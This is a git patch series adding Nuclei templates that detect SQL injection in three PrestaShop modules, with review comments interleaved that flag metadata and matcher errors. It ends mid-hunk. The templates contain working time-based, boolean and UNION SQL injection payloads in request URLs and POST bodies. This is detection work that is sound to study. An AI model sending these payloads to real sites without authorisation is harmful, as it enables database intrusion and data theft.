From 6455bcf669b7686101c6a0aff95e208b9741a1b8 Mon Sep 17 00:00:00 2001 From: mastercho Date: Thu, 12 Sep 2024 11:55:38 +0300 Subject: [PATCH 01/11] Added CVEs --- http/cves/2023/CVE-2023-27847.yaml | 94 ++++++++++++++++++++++++++++++ http/cves/2023/CVE-2023-39650.yaml | 62 ++++++++++++++++++++ http/cves/2024/CVE-2024-36683.yaml | 73 +++++++++++++++++++++++ 3 files changed, 229 insertions(+) create mode 100644 http/cves/2023/CVE-2023-27847.yaml create mode 100644 http/cves/2023/CVE-2023-39650.yaml create mode 100644 http/cves/2024/CVE-2024-36683.yaml diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml new file mode 100644 index 0000000000..bcd3f14386 --- /dev/null +++ b/http/cves/2023/CVE-2023-27847.yaml 
@@ -0,0 +1,94 @@ +id: CVE-2023-27847 + +info: + name: PrestaShop xipblog SQL Injection + author: mastercho + severity: critical + description: | + In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27847 + - https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-27847 + cwe-id: CWE-89 + epss-score: 0.04685 + epss-percentile: 0.91818 + metadata: + redirects: true + max-redirects: 3 + framework: prestashop + shodan-query: http.component:"Prestashop" + tags: cve,cve2023,prestashop,sqli,unauth,xipblog + + +flow: http(1) && http(2) + + +http: + - raw: + - | + @timeout: 20s + GET / HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + host-redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "xipblog")' + condition: and + internal: true + + - raw: + - | + @timeout: 20s + GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5484--+xhCs HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5485--+xhCs HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET 
/module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562),NULL,NULL--+- HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + stop-at-first-match: true + host-redirects: true + matchers: + - type: dsl + name: time-based + dsl: + - 'duration_1>=5' + condition: and + + - type: dsl + name: blind-based + dsl: + - 'contains(body_2, "kr_blog_post_area")' + - '!contains(body_3, "kr_blog_post_area")' + condition: and + + - type: dsl + name: union-based + dsl: + - 'contains(body_4, "c8c605999f3d8352d7bb792cf3fdb25b")' + condition: and \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml new file mode 100644 index 0000000000..914e15d68f --- /dev/null +++ b/http/cves/2023/CVE-2023-39650.yaml 
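Review bot: The `impact:` text of this new template reads `unauthorized accessand data leakage` (missing space), and the same copied paragraph carries the typo in the CVE-2023-39650 and CVE-2024-36683 hunks of this patch; the line should read `potentially leading to unauthorized access and data leakage.` The three files also share byte-identical `epss-score: 0.04685` and `epss-percentile: 0.91818`, which looks like the classification block was copied from this file rather than looked up per CVE, so the values for the other two CVEs should be confirmed against the EPSS feed before merge. `redirects: true` and `max-redirects: 3` under `metadata` appear to be descriptive only; the request-level `host-redirects` / `max-redirects` settings below are the ones that take effect, so the duplicate keys can go to avoid suggesting they are enforced.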
@@ -0,0 +1,62 @@ +id: CVE-2023-39650 + +info: + name: PrestaShop Theme Volty CMS Blog SQL Injection + author: mastercho + severity: critical + description: | + In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39650 + - https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-27847 + cwe-id: CWE-89 + epss-score: 0.04685 + epss-percentile: 0.91818 + metadata: + redirects: true + max-redirects: 3 + framework: prestashop + shodan-query: http.component:"Prestashop" + tags: cve,cve2023,prestashop,sqli,unauth,tvcmsblog + +http: + - raw: + - | + @timeout: 20s + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + host-redirects: true + matchers: + - type: dsl + name: time-based + dsl: + - 'duration_1>=5' + - 'status_code_1 == 200 && contains(body_1, "tvcmsblog")' + condition: and + + - type: dsl + name: blind-based + dsl: + - 'status_code_2 == 200 && contains(body_2, "tvcmsblog")' + - 'status_code_2 == 200 && status_code_3 == 302' + condition: and \ No newline at end of file 
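Review bot: `cve-id: CVE-2023-27847` in the classification block contradicts `id: CVE-2023-39650` at the top of the same file, so the template would be catalogued under the wrong CVE; it should read `cve-id: CVE-2023-39650`. The blind-based matcher's second clause `status_code_2 == 200 && status_code_3 == 302` uses a redirect on the false-condition request as the only difference oracle, which is weaker than the `kr_blog_post_area` body diff the sibling xipblog template uses; a 302 produced for unrelated reasons (a cross-host locale or HTTPS redirect that `host-redirects` does not follow) would yield a critical finding with no injection evidence. If the module emits a body difference between the true and false responses, matching on that, or at least requiring `body_2 != body_3`, would tighten it.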
diff --git a/http/cves/2024/CVE-2024-36683.yaml b/http/cves/2024/CVE-2024-36683.yaml new file mode 100644 index 0000000000..1d9e0f56fb --- /dev/null +++ b/http/cves/2024/CVE-2024-36683.yaml 
@@ -0,0 +1,73 @@ +id: CVE-2024-36683 + +info: + name: PrestaShop productsalert SQL Injection + author: mastercho + severity: critical + description: | + In the module “Products Alert” (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36683 + - https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-36683 + cwe-id: CWE-89 + epss-score: 0.04685 + epss-percentile: 0.91818 + metadata: + redirects: true + max-redirects: 3 + framework: prestashop + shodan-query: http.component:"Prestashop" + tags: cve,cve2023,prestashop,sqli,unauth,productsalert + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "modules/productsalert")' + - 'contains(body, "module/productsalert")' + condition: or + internal: true + + - raw: + - | + @timeout: 20s + POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158 + - | + @timeout: 20s + POST /module/productsalert/AjaxProcess HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 
'pAlk'='pAlk&pid=13158 + + stop-at-first-match: true + host-redirects: true + matchers: + - type: dsl + name: time-based + dsl: + - 'duration_1>=5' + - 'duration_2>=5' + condition: or \ No newline at end of file From 0360e616e69316e47cb87fd6d6ec73529f39e17b Mon Sep 17 00:00:00 2001 From: mastercho Date: Thu, 12 Sep 2024 12:01:33 +0300 Subject: [PATCH 02/11] Fix lint --- http/cves/2023/CVE-2023-27847.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index bcd3f14386..09f5f868cb 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -45,7 +45,7 @@ http: - 'contains(body, "xipblog")' condition: and internal: true - + - raw: - | @timeout: 20s From 443c618c819e6d55c0b5837bd6606dca5ef40006 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Sep 2024 17:16:21 +0400 Subject: [PATCH 03/11] updated req & matcher --- http/cves/2023/CVE-2023-27847.yaml | 73 +++++------------------------- 1 file changed, 11 insertions(+), 62 deletions(-) diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index 09f5f868cb..811e38d04d 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -1,7 +1,7 @@ id: CVE-2023-27847 info: - name: PrestaShop xipblog SQL Injection + name: PrestaShop xipblog - SQL Injection author: mastercho severity: critical description: | @@ -9,8 +9,8 @@ info: impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27847 - https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-27847 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 
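Review bot: `tags: cve,cve2023,prestashop,sqli,unauth,productsalert` labels a 2024 CVE with the 2023 year tag, so tag-based selection of 2024 templates would skip this file; the line should be `tags: cve,cve2024,prestashop,sqli,unauth,productsalert`. The same `cve2023` survives into the rewritten tags line in the PATCH 06 hunk and the context of the PATCH 10 hunk, so fixing it here avoids carrying it through the series. The time-based matcher pairs `duration_1>=5` and `duration_2>=5` under `condition: or` with no response-content clause, so a target that is merely slow on either endpoint is reported as critical; the `flow` precheck only establishes that the module is referenced on `/`, not that the POST reached it.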
@@ -20,75 +20,24 @@ info: epss-percentile: 0.91818 metadata: redirects: true - max-redirects: 3 + max-redirects: 1 framework: prestashop shodan-query: http.component:"Prestashop" - tags: cve,cve2023,prestashop,sqli,unauth,xipblog - - -flow: http(1) && http(2) + fofa-query: app="Prestashop" + tags: cve,cve2023,prestashop,sqli,xipblog +variables: + num: "999999999" http: - raw: - | @timeout: 20s - GET / HTTP/1.1 + GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} - host-redirects: true - max-redirects: 3 - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(body, "xipblog")' - condition: and - internal: true - - raw: - - | - @timeout: 20s - GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - @timeout: 20s - GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5484--+xhCs HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - @timeout: 20s - GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5485--+xhCs HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - @timeout: 20s - GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562),NULL,NULL--+- HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - stop-at-first-match: true host-redirects: true matchers: - - type: dsl - name: time-based - dsl: - - 
'duration_1>=5' - condition: and - - - type: dsl - name: blind-based - dsl: - - 'contains(body_2, "kr_blog_post_area")' - - '!contains(body_3, "kr_blog_post_area")' - condition: and - - - type: dsl - name: union-based - dsl: - - 'contains(body_4, "c8c605999f3d8352d7bb792cf3fdb25b")' - condition: and \ No newline at end of file + - type: word + words: + - '{{md5({{num}})}}' From 8ed3453a2bceb96c01c6dfb2e6c8f6d3eb3102f9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Sep 2024 17:26:11 +0400 Subject: [PATCH 04/11] updated req. & matcher --- http/cves/2023/CVE-2023-39650.yaml | 42 ++++++++---------------------- 1 file changed, 11 insertions(+), 31 deletions(-) diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml index 914e15d68f..9219364e6d 100644 --- a/http/cves/2023/CVE-2023-39650.yaml +++ b/http/cves/2023/CVE-2023-39650.yaml 
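Review bot: The rewritten `tags:` line drops `unauth` although the description and the CVSS vector (`PR:N`) still describe an unauthenticated injection, so the template would no longer be selected by an `unauth` tag filter; keep it as `tags: cve,cve2023,prestashop,sqli,unauth,xipblog`. `max-redirects: 1` is added under `metadata`, where it appears to be descriptive only, while the request block sets `host-redirects: true` without its own `max-redirects`, so the engine default applies and the metadata value does not describe what is actually sent. The `@timeout: 20s` annotation is kept on a request that no longer carries a `SLEEP`, which is harmless but misleading about why the timeout exists.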
@@ -1,62 +1,42 @@ id: CVE-2023-39650 info: - name: PrestaShop Theme Volty CMS Blog SQL Injection + name: PrestaShop Theme Volty CMS Blog - SQL Injection author: mastercho severity: critical description: | - In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions. + In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39650 - https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-39650 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2023-27847 + cve-id: CVE-2023-39650 cwe-id: CWE-89 epss-score: 0.04685 epss-percentile: 0.91818 metadata: - redirects: true - max-redirects: 3 + max-request: 1 + verified: true framework: prestashop - shodan-query: http.component:"Prestashop" - tags: cve,cve2023,prestashop,sqli,unauth,tvcmsblog + shodan-query: html:"/tvcmsblog" + tags: cve,cve2023,prestashop,sqli,tvcmsblog http: - raw: - | @timeout: 20s - GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1 + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(6)))oqFL)--+yxoW HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - @timeout: 20s - GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - @timeout: 20s - GET 
/module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} host-redirects: true matchers: - type: dsl name: time-based dsl: - - 'duration_1>=5' - - 'status_code_1 == 200 && contains(body_1, "tvcmsblog")' + - 'duration>=6' + - 'status_code == 200 && contains_all(tolower(response), "tvcmsblog", "prestashop")' condition: and - - - type: dsl - name: blind-based - dsl: - - 'status_code_2 == 200 && contains(body_2, "tvcmsblog")' - - 'status_code_2 == 200 && status_code_3 == 302' - condition: and \ No newline at end of file From 0e4e0cf87b547327d7a8a0b973400623ca8866e3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Sep 2024 17:51:49 +0400 Subject: [PATCH 05/11] Update CVE-2023-27847.yaml --- http/cves/2023/CVE-2023-27847.yaml | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index 811e38d04d..df4f434dbe 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -19,10 +19,10 @@ info: epss-score: 0.04685 epss-percentile: 0.91818 metadata: - redirects: true - max-redirects: 1 + verified: true + max-request: 2 framework: prestashop - shodan-query: http.component:"Prestashop" + shodan-query: html:"/xipblog" fofa-query: app="Prestashop" tags: cve,cve2023,prestashop,sqli,xipblog 
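Review bot: With the two boolean requests removed, the only evidence left in the new matcher is `duration>=6` plus a response mentioning `tvcmsblog` and `prestashop`, strings that a generic error page for this path may contain anyway, so a backend that is simply slow under load satisfies it. The removed `AND 5484=5484` / `AND 5484=5485` pair provided a latency-independent oracle, and a baseline request without the `SLEEP` clause compared against the timed one would likewise make the match much harder to trip by latency alone; dropping both leaves a critical-severity template resting on one timing. The `unauth` tag is also removed from `tags:` while the vector stays `PR:N`.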
@@ -36,8 +36,21 @@ http: GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1 Host: {{Hostname}} + - | + @timeout: 20s + GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(6)))AuDU)--+lafl HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true host-redirects: true matchers: - type: word + part: body_1 words: - '{{md5({{num}})}}' + + - type: dsl + dsl: + - 'duration_2>=6' + - 'contains_all(tolower(response), "prestashop", "xipblog")' + condition: and From 22c1cc999148b8e8c656f09499d268e56bd31407 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 16 Sep 2024 18:06:50 +0400 Subject: [PATCH 06/11] Update CVE-2024-36683.yaml --- http/cves/2024/CVE-2024-36683.yaml | 46 +++++++++--------------------- 1 file changed, 14 insertions(+), 32 deletions(-) diff --git a/http/cves/2024/CVE-2024-36683.yaml b/http/cves/2024/CVE-2024-36683.yaml index 1d9e0f56fb..b0699514ed 100644 --- a/http/cves/2024/CVE-2024-36683.yaml +++ b/http/cves/2024/CVE-2024-36683.yaml 
@@ -1,16 +1,16 @@ id: CVE-2024-36683 info: - name: PrestaShop productsalert SQL Injection + name: PrestaShop productsalert - SQL Injection author: mastercho severity: critical description: | - In the module “Products Alert” (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions. + In the module 'Products Alert' (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36683 - https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html + - https://nvd.nist.gov/vuln/detail/CVE-2024-36683 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 
@@ -19,45 +19,27 @@ info: epss-score: 0.04685 epss-percentile: 0.91818 metadata: - redirects: true - max-redirects: 3 + verified: true + max-request: 2 framework: prestashop - shodan-query: http.component:"Prestashop" - tags: cve,cve2023,prestashop,sqli,unauth,productsalert - -flow: http(1) && http(2) + shodan-query: html:"/productsalert" + fofa-query: body="/productsalert" + tags: cve,cve2023,prestashop,sqli,productsalert http: - raw: - | - GET / HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - max-redirects: 3 - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(body, "modules/productsalert")' - - 'contains(body, "module/productsalert")' - condition: or - internal: true - - - raw: - - | - @timeout: 20s + @timeout: 30s POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158 + - | - @timeout: 20s + @timeout: 30s POST /module/productsalert/AjaxProcess HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pid=13158 @@ -68,6 +50,6 @@ http: - type: dsl name: time-based dsl: - - 'duration_1>=5' - - 'duration_2>=5' - condition: or \ No newline at end of file + - 'duration_1>=5 || duration_2>=5' + - 'contains_all(tolower(response), "productsalert", "prestashop")' + condition: and From 2809ff8f3972d353c9a60db6272df69a1d0f918e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 18 Sep 2024 13:02:24 +0530 Subject: [PATCH 07/11] remove xipblog matcher --- http/cves/2023/CVE-2023-27847.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
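Review bot: The rewritten matcher ANDs `duration_1>=5 || duration_2>=5` with `contains_all(tolower(response), "productsalert", "prestashop")`, but in a multi-request template the unsuffixed `response` refers, as far as I can tell, to the last response only, so when request 1 is the one that sleeps the content check inspects request 2's body instead; `contains_all(tolower(body_1), "productsalert", "prestashop") || contains_all(tolower(body_2), "productsalert", "prestashop")` would pair the content clause with the duration clause. The re-added `tags:` line still carries `cve2023` for a 2024 CVE. Removing the `flow` precheck means both POST bodies are now sent to every host, which the new `max-request: 2` reflects correctly.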
diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index df4f434dbe..a2c668f5fc 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -52,5 +52,5 @@ http: - type: dsl dsl: - 'duration_2>=6' - - 'contains_all(tolower(response), "prestashop", "xipblog")' + - 'contains_all(tolower(response), "prestashop")' condition: and From 862eef161fa549fc404f47417e313c7af64a4b19 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 18 Sep 2024 19:08:59 +0400 Subject: [PATCH 08/11] fixed cve-2023-27847 --- http/cves/2023/CVE-2023-27847.yaml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-27847.yaml b/http/cves/2023/CVE-2023-27847.yaml index a2c668f5fc..13b6017128 100644 --- a/http/cves/2023/CVE-2023-27847.yaml +++ b/http/cves/2023/CVE-2023-27847.yaml @@ -26,10 +26,23 @@ info: fofa-query: app="Prestashop" tags: cve,cve2023,prestashop,sqli,xipblog +flow: http(1) && http(2) + variables: num: "999999999" http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_any(tolower(response), "prestashop", "xipblog")' + internal: true + - raw: - | @timeout: 20s @@ -45,12 +58,12 @@ http: host-redirects: true matchers: - type: word + name: union-based part: body_1 words: - '{{md5({{num}})}}' - type: dsl + name: time-based dsl: - 'duration_2>=6' - - 'contains_all(tolower(response), "prestashop")' - condition: and From f5f00358a1c6f0002b878282d9b1b9f3ca71c6c5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 19 Sep 2024 12:12:01 +0400 Subject: [PATCH 09/11] Update CVE-2023-39650.yaml --- http/cves/2023/CVE-2023-39650.yaml | 53 +++++++++++++----------------- 1 file changed, 23 insertions(+), 30 deletions(-) 
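Review bot: With the `contains_all` clause removed, the time-based matcher in the second hunk is just `duration_2>=6`, so any host that passes the `contains_any(tolower(response), "prestashop", "xipblog")` precheck and answers slowly once is reported as a critical SQLi; keeping a response-content clause, or comparing against a request without the `SLEEP`, would restore some evidence. The new precheck `GET /` sets no `host-redirects`, unlike the injection requests, so storefronts that redirect `/` to a language path will fail the internal matcher and never be tested. The `flow` also raises the request count to three while `max-request: 2` (added in PATCH 05, outside this hunk) presumably still sits in `metadata`; it should become `max-request: 3`.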
diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml index 9219364e6d..c6f686962e 100644 --- a/http/cves/2023/CVE-2023-39650.yaml +++ b/http/cves/2023/CVE-2023-39650.yaml 
@@ -1,42 +1,35 @@ -id: CVE-2023-39650 - -info: - name: PrestaShop Theme Volty CMS Blog - SQL Injection - author: mastercho - severity: critical - description: | - In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. - reference: - - https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html - - https://nvd.nist.gov/vuln/detail/CVE-2023-39650 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-39650 - cwe-id: CWE-89 - epss-score: 0.04685 - epss-percentile: 0.91818 - metadata: - max-request: 1 - verified: true - framework: prestashop - shodan-query: html:"/tvcmsblog" - tags: cve,cve2023,prestashop,sqli,tvcmsblog - http: - raw: - | @timeout: 20s - GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(6)))oqFL)--+yxoW HTTP/1.1 + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1 Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + @timeout: 20s + GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} host-redirects: true matchers: - type: dsl name: time-based dsl: - - 'duration>=6' - - 'status_code == 200 && contains_all(tolower(response), "tvcmsblog", "prestashop")' + - 'duration_1>=5' + - 'status_code_1 == 200 && contains(body_1, "tvcmsblog")' + condition: and + + - type: dsl + name: 
